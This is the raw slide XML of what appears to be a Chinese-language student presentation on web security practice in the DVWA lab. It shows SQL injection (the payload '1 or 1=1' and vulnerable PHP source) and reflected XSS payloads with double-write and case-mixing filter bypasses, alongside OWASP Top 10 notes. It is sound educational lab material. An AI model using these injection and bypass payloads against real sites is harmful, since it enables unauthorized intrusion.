            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" b="1" dirty="0"/>
              <a:t> = $id;";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="20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B0DB68-6BD9-4C68-9ACB-9410E09341F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4523407" y="3839688"/>
            <a:ext cx="6360844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語法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>mysqli_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>connection,escapestring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>轉義在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>語句中使用的字串中的特殊字元。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="265646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56EE7-3058-42AB-894C-173D96C9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9016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TW" sz="6000" b="1" dirty="0"/>
              <a:t>DEMO:: SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>DVWA_1.10_medium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FAF2C7-C9DC-43B9-8C95-B57480A6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738"/>
            <a:ext cx="5902830" cy="35101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D62E8C-0410-49C0-B43B-0A95A1D1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172" y="1325563"/>
            <a:ext cx="3653926" cy="113162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3DC2AC-50D7-4DC2-83BE-C1C5ACD5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28" y="2651126"/>
            <a:ext cx="2506613" cy="4021722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2ED14B7-46B9-4C6B-88AF-A5F1146A59E2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6354535" y="1597461"/>
            <a:ext cx="517071" cy="587829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FC1041CA-9015-4958-8675-E6AF89DC0FA8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8605862" y="2475463"/>
            <a:ext cx="424543" cy="351325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1E06A6-3B00-4F52-B926-94603D8ADCBF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1338943" y="3135086"/>
            <a:ext cx="2530928" cy="11103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793C6B-DF74-46A6-AD58-4F05232D60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7340398" y="1307290"/>
            <a:ext cx="2473073" cy="290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428DE1-957E-4938-B0A2-2C4DACBEC803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9046733" y="2323325"/>
            <a:ext cx="232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value="1 or 1=1"</a:t>
            </a:r>
            <a:endParaRPr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CC902FF-A87A-4183-AA42-8EBAB5C11B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3939924" y="3783764"/>
            <a:ext cx="152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value="1 "</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2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02894B-D1E6-4ED4-B745-16FFFC99C451}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266254" y="5474834"/>
            <a:ext cx="672491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因程式使用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mysqli_real_escape_string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函數過濾特殊字元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故使用數字型注入攻擊略過特殊字元</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="143795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5938E-3F41-4B53-85E0-A0CA3DB0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3812"/>
            <a:ext cx="12192000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5400" b="1" dirty="0"/>
              <a:t>DEMO:: SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:b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</a:rPr>
              <a:t>DVWA_1.10_high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E86CDD-6FE7-4D5E-AB58-2C3125AC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88" y="1719375"/>
            <a:ext cx="8001423" cy="39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90170-E64D-4B39-BAF8-CD6B1676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08314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4800" dirty="0"/>
              <a:t>DEMO:: SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:b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</a:rPr>
              <a:t>SQL Injection Source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B41A39-F5A7-4A40-8348-D27948EEB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53243"/>
            <a:ext cx="12192000" cy="5404757"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t> &lt;?php</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>if( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" err="1"/>
              <a:t>isset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>( $_SESSION [ 'id' ] ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>    // Get input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>    $id = $_SESSION[ 'id' ];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>// Check database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>    $query  = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="80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altLang="zh-TW" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM users WHERE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>user_id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> = '$id'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8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8000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LIMIT 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>    $result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" err="1"/>
              <a:t>mysqli_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>($GLOBALS["___</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" err="1"/>
              <a:t>mysqli_ston</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>"], $query ) or die( '&lt;pre&gt;Something went wrong.&lt;/pre&gt;' );</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>    // Get results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>    while( $row = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" err="1"/>
              <a:t>mysqli_fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>( $result ) ) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>        // Get values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>        $first = $row["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" err="1"/>
              <a:t>first_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>        $last  = $row["</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0" err="1"/>
              <a:t>last_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>"];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="8000" dirty="0"/>
              <a:t>?&gt;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6BCA43-4D31-4FCE-9252-2E1D6D89BEDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4261757" y="3198167"/>
            <a:ext cx="773961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SQL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</a:rPr>
              <a:t>查詢語句中增加了</a:t>
            </a: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LIMIT 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>，達到控制只輸出一個結果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14341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3F1A7-565C-459E-A6B0-1C9DEDE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sz="4400" dirty="0"/>
              <a:t>DEMO:: SQL Injection</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL Injection Source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96C12C-84AC-4DD4-92B2-C0537FB3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39" y="1938081"/>
            <a:ext cx="3915321" cy="3667637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="箭號: 向下 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831974CF-B742-4D13-9943-832BEEB994FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1877787" y="2792186"/>
            <a:ext cx="767442" cy="783770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A5BFAE-5D55-43B6-AFD9-8C992EE5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44" y="2052382"/>
            <a:ext cx="6048382" cy="36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41B389C-60B3-41AE-841A-1E5FC26E4690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="835008" y="2136338"/>
            <a:ext cx="105219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/>
              <a:t>Reflected Cross Site Scripting exploitation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4800" dirty="0"/>
              <a:t>in DVWA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4800" dirty="0"/>
              <a:t>漏洞實務測試</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4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203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5FBBB-EB53-48EB-9AC9-4CCBF269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811"/>
            <a:ext cx="12192000" cy="132556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DEMO::DVWA_1.10_low</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="48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698498-AA6D-448B-8B5A-7B37075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9" y="1775393"/>
            <a:ext cx="7147840" cy="4595812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A7D68576-7510-4F0E-AE8F-9D2166A32925}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4604657" y="2331184"/>
            <a:ext cx="3614057" cy="10978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0931BE-1E8F-4841-886B-82B77716DF72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5540747" y="3673189"/>
            <a:ext cx="2492990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正常輸入自己的名字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518C4A9-9EDD-4AF8-90F3-0386EC9DC5A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2111829" y="5747657"/>
            <a:ext cx="2073729" cy="4735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FAC96-9BAB-4879-BBFD-0680AF47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400" dirty="0"/>
              <a:t>DEMO::DVWA_1.10_low</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;marquee&gt;4090E036&lt;/marquee&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="31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E3C782-7A0B-4D38-934A-9EB1DFDD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96" y="2209613"/>
            <a:ext cx="8108208" cy="33584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74734F8-A9B2-4CA5-9B79-C020C9F7D9F9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3200400" y="2307295"/>
            <a:ext cx="336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/>
              <a:t>&lt;marquee&gt;4090E036&lt;/marquee&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1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BD4D4AB-01D6-4875-BB9B-74E42396B77A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5584371" y="3069771"/>
            <a:ext cx="1208315" cy="48985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6625AC-7071-4872-B6D3-D33D9CD5355A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5453743" y="3657994"/>
            <a:ext cx="172354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會持續移動</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="399249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FCD2F-2F07-48ED-A2D7-9ADFA4D5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zh-TW" sz="4800" dirty="0"/>
              <a:t>DEMO::DVWA_1.10_low</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
            </a:b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輸入一段</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" b="1" dirty="0" err="1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0D9DE-338E-4659-91C8-2222D32D5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099" y="1892037"/>
            <a:ext cx="6019800" cy="42771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&lt;script&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xss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 4090E036')&lt;/script&gt;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7A18C1-62DC-41D4-AC02-3B1BAA01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93" y="2521104"/>
            <a:ext cx="7350811" cy="32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48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EED33-C812-4012-8BD7-8519C6A9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TW" sz="6000" b="1" dirty="0"/>
              <a:t>DEMO::DVWA_1.10_Medium</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="31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雙寫繞過的攻擊技術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59878-86CC-4032-9EE4-A7ACC01FD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957" y="1868972"/>
            <a:ext cx="7326086" cy="49303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pPr algn="ctr"/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4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>sc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&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ript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&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xss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 S109000565')&lt;/script&gt;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76FAB0-CD48-4D5F-985D-EE789BB2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94" y="2721264"/>
            <a:ext cx="8653412" cy="37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888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網站的資安威脅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363" y="911225"/>
            <a:ext cx="6689271" cy="509361"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.ithome.com.tw/news/139504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734250-B4CE-495F-8E96-62E86D1F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77" y="1420586"/>
            <a:ext cx="6958045" cy="54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9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5FC75-7B17-46EC-B367-A58A5E06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3458"/>
            <a:ext cx="12192000" cy="1325563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TW" sz="6000" b="1" dirty="0"/>
              <a:t>DEMO::DVWA_1.10_Medium</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" sz="6000" b="1" dirty="0"/>
            </a:br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大小寫混淆繞過</a:t>
            </a:r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的攻擊技術</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="6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BAD4B7-CC41-4B36-94A4-AD0D7B2B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099" y="2338249"/>
            <a:ext cx="6019800" cy="558346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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>ScRipt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&gt;alert('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r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</a:rPr>
              <a:t> 4090E036')&lt;/script&gt;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zh-TW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6E529B-1EC1-4322-BCC3-8740FCD0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84" y="3255823"/>
            <a:ext cx="8480429" cy="30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56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B11A2-2332-4900-8FB4-B22F61A4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學習心得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11E1A-DD67-4862-8DB9-BC36A118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4400" dirty="0"/>
              <a:t>了解</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>平台</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0"/>
              <a:t>操作方式</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="4400" dirty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400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>了解駭客入侵的手法，以及防範的手法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="zh-TW" sz="4400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>OWASP TOP 10 到OWASP API TOP 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="4400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="44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4400" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>閱讀了資安相關新聞報導</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="44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>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p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67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21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網站的資安威脅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71" y="820964"/>
            <a:ext cx="6738257" cy="509361"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.ithome.com.tw/news/145198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C818C6-BA4E-49B4-851D-1147AED0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02" y="1330325"/>
            <a:ext cx="8643194" cy="53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4521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網站的資安威脅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777875"/>
            <a:ext cx="6705600" cy="525689"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.ithome.com.tw/news/144918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3EB660-7291-4C12-8775-EA966E92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04" y="1336221"/>
            <a:ext cx="8407792" cy="53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DCE595-7E1D-47D5-894B-D9F95561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318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網站的資安威脅 </a:t>
            </a:r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3E404-FD69-4492-BEAE-85DC8428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228" y="912812"/>
            <a:ext cx="6901543" cy="525689"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>https://www.ithome.com.tw/news/144796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79546C-50E0-424B-93EA-EC58B9F89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50" y="1508124"/>
            <a:ext cx="8379898" cy="53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13C45B-2EAC-4897-8427-995A6790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b="1" dirty="0"/>
              <a:t>OWASP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top 10 2021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3A38B7-CD9B-4500-B493-274C270BA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57" y="1502229"/>
            <a:ext cx="10749643" cy="4990645"/>
          </a:xfrm>
        </p:spPr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注射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損壞的身份驗證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敏感數據暴露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XML </a:t>
            </a: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外部實體 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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(XXE)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損壞的訪問控制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安全配置錯誤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跨站腳本（</a:t>
            </a:r>
            <a:r>
